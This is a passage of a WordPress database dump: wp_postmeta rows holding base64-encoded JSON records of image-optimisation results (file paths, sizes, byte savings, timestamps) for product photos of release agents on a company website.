bnQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzIyMTYsImlkIjoxMzkwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYXYtcHRmZS1yZWxlYXNlLWFnZW50LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYXYtcHRmZS1yZWxlYXNlLWFnZW50LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyYXYtcHRmZS1yZWxlYXNlLWFnZW50LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxODQsInRpbWUiOjE0ODM1NzIyMTksImlkIjoxMzkwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYXYtcHRmZS1yZWxlYXNlLWFnZW50LTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYXYtcHRmZS1yZWxlYXNlLWFnZW50LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyYXYtcHRmZS1yZWxlYXNlLWFnZW50LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxMjQsInRpbWUiOjE0ODM1NzIyMjIsImlkIjoxMzkwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYXYtcHRmZS1yZWxlYXNlLWFnZW50LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYXYtcHRmZS1yZWxlYXNlLWFnZW50LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyYXYtcHRmZS1yZWxlYXNlLWFnZW50LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxMTIsInRpbWUiOjE0ODM1NzIyMjUsImlkIjoxMzkwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYXYtcHRmZS1yZWxlYXNlLWFnZW50LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYXYtcHRmZS1yZWxlYXNlLWFnZW50LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyYXYtcHRmZS1yZWxlYXNlLWFnZW50LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyMjI4LCJpZCI6MTM5MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmF2LXB0ZmUtcmVsZWFzZS1hZ2VudC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmF2LXB0ZmUtcmVsZWFzZS1hZ2VudC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMmF2LXB0ZmUtcmVsZWFzZS1hZ2VudC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjIzMCwiaWQiOjEzOTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhdi1wdGZlLXJlbGVhc2UtYWdlbnQtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhdi1wdGZlLXJlbGVhc2UtYWdlbnQtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJhdi1wdGZlLXJlbGVhc2UtYWdlbnQtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzIyMzMsImlkIjoxMzkwfV0='); 
INSERT INTO `wp_postmeta` VALUES (29565, 1389, 'wpfc_optimisation_reduction', '2169072'); 
INSERT INTO `wp_postmeta` VALUES (29566, 1389, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtcmVkLXJlbGVhc2UtYWdlbnQuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZC1yZWQtcmVsZWFzZS1hZ2VudC5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyYWQtcmVkLXJlbGVhc2UtYWdlbnQuanBnIiwicmVkdWN0aW9uIjoyMTY4NjU1LCJ0aW1lIjoxNDgzNTcyMjQ2LCJpZCI6IjEzODkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLXJlZC1yZWxlYXNlLWFnZW50LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtcmVkLXJlbGVhc2UtYWdlbnQtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJhZC1yZWQtcmVsZWFzZS1hZ2VudC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjI0OCwiaWQiOjEzODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtcmVkLXJlbGVhc2UtYWdlbnQtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZC1yZWQtcmVsZWFzZS1hZ2VudC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMmFkLXJlZC1yZWxlYXNlLWFnZW50LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyMjUxLCJpZCI6MTM4OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZC1yZWQtcmVsZWFzZS1hZ2VudC03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLXJlZC1yZWxlYXNlLWFnZW50LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyYWQtcmVkLXJlbGVhc2UtYWdlbnQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzIyNTQsImlkIjoxMzg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLXJlZC1yZWxlYXNlLWFnZW50LTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLXJlZC1yZWxlYXNlLWFnZW50LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJhZC1yZWQtcmVsZWFzZS1hZ2VudC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyMjU4LCJpZCI6MTM4OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZC1yZWQtcmVsZWFzZS1hZ2VudC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLXJlZC1yZWxlYXNlLWFnZW50LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyYWQtcmVkLXJlbGVhc2UtYWdlbnQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzIyNjAsImlkIjoxMzg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLXJlZC1yZWxlYXNlLWFnZW50LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtcmVkLXJlbGVhc2UtYWdlbnQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJhZC1yZWQtcmVsZWFzZS1hZ2VudC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjI2MywiaWQiOjEzODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtcmVkLXJlbGVhc2UtYWdlbnQtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZC1yZWQtcmVsZWFzZS1hZ2VudC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMmFkLXJlZC1yZWxlYXNlLWFnZW50LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyMjY1LCJpZCI6MTM4OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZC1yZWQtcmVsZWFzZS1hZ2VudC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLXJlZC1yZWxlYXNlLWFnZW50LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyYWQtcmVkLXJlbGVhc2UtYWdlbnQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzIyNjgsImlkIjoxMzg5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtcmVkLXJlbGVhc2UtYWdlbnQtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZC1yZWQtcmVsZWFzZS1hZ2VudC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMmFkLXJlZC1yZWxlYXNlLWFnZW50LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxNjEsInRpbWUiOjE0ODM1NzIyNzEsImlkIjoxMzg5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtcmVkLXJlbGVhc2UtYWdlbnQtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZC1yZWQtcmVsZWFzZS1hZ2VudC0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMmFkLXJlZC1yZWxlYXNlLWFnZW50LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxMDAsInRpbWUiOjE0ODM1NzIyNzMsImlkIjoxMzg5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtcmVkLXJlbGVhc2UtYWdlbnQtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZC1yZWQtcmVsZWFzZS1hZ2VudC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMmFkLXJlZC1yZWxlYXNlLWFnZW50LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxNDUsInRpbWUiOjE0ODM1NzIyNzYsImlkIjoxMzg5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtcmVkLXJlbGVhc2UtYWdlbnQtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZC1yZWQtcmVsZWFzZS1hZ2VudC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMmFkLXJlZC1yZWxlYXNlLWFnZW50LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyMjc4LCJpZCI6MTM4OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLXJlZC1yZWxlYXNlLWFnZW50LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtcmVkLXJlbGVhc2UtYWdlbnQtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJhZC1yZWQtcmVsZWFzZS1hZ2VudC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjI4MSwiaWQiOjEzODl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZC1yZWQtcmVsZWFzZS1hZ2VudC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLXJlZC1yZWxlYXNlLWFnZW50LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyYWQtcmVkLXJlbGVhc2UtYWdlbnQtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzIyODQsImlkIjoxMzg5fV0='); 
INSERT INTO `wp_postmeta` VALUES (29567, 1388, 'wpfc_optimisation_reduction', '2179505'); 
INSERT INTO `wp_postmeta` VALUES (29568, 1388, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtcHRmZS1yZWxlYXNlLWFnZW50LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtcHRmZS1yZWxlYXNlLWFnZW50LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJhZC1wdGZlLXJlbGVhc2UtYWdlbnQuanBnIiwicmVkdWN0aW9uIjoyMTc5MTI2LCJ0aW1lIjoxNDgzNTcyMjk1LCJpZCI6IjEzODgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLXB0ZmUtcmVsZWFzZS1hZ2VudC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTEyMmFkLXB0ZmUtcmVsZWFzZS1hZ2VudC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTEyMmFkLXB0ZmUtcmVsZWFzZS1hZ2VudC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjI5OCwiaWQiOjEzODh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtcHRmZS1yZWxlYXNlLWFnZW50LTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTIyYWQtcHRmZS1yZWxlYXNlLWFnZW50LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTIyYWQtcHRmZS1yZWxlYXNlLWFnZW50LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyMzAxLCJpZCI6MTM4OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZC1wdGZlLXJlbGVhc2UtYWdlbnQtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xMjJhZC1wdGZlLXJlbGVhc2UtYWdlbnQtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xMjJhZC1wdGZlLXJlbGVhc2UtYWdlbnQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24i